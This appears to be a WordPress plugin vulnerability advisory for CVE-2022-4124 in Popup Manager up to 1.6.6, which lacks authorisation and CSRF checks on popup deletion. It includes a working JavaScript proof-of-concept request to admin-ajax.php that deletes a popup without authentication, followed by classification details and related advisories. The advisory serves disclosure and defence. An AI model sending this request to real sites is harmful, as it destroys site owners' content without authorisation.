Popup Manager <= 1.6.6 – Unauthenticated Arbitrary Popup Deletion | CVE 2022-4124 | Plugin Vulnerabilities

Description

The plugin does not have authorisation and CSRF checks when deleting popups, which could allow unauthenticated users to delete them

Proof of Concept

As an unauthenticated users, or via CSRF:

fetch('/wp-admin/admin-ajax.php', {
        method: 'POST',
        headers: new Headers({
            'Content-Type': 'application/x-www-form-urlencoded',
        }),
        body: 'action=pm_delete_popup&popup_id=2',
        redirect: 'follow'
    }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));

Affects Plugins

No known fix

References

CVE

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Lana Codes

Submitter

Lana Codes

Submitter website

https://lana.codes/

Submitter twitter

Verified

Yes

WPVDB ID

60786bf8-c0d7-4d80-b189-866aba79bce2

Timeline

Publicly Published

2022-11-28 (about 1 years ago)

Added

2022-11-28 (about 1 years ago)

Last Updated

2022-11-28 (about 1 years ago)

Other

Published

Title

Published

2023-11-14

Title

Events Addon for Elementor < 2.1.3 - Missing Authorization

Published

2024-03-29

Title

WPC Badge Management for WooCommerce < 2.4.1 - Missing Authorization

Published

2023-06-26

Title

Subscribe2 – Form, Email Subscribers & Newsletters < 10.41 - Missing Access Controls

Published

2024-04-12

Title

Podlove Podcast Publisher < 4.1.1 - Missing Authorization

Published

2024-01-10

Title

Products & Order Export for WooCommerce < 2.0.9 - Missing Authorization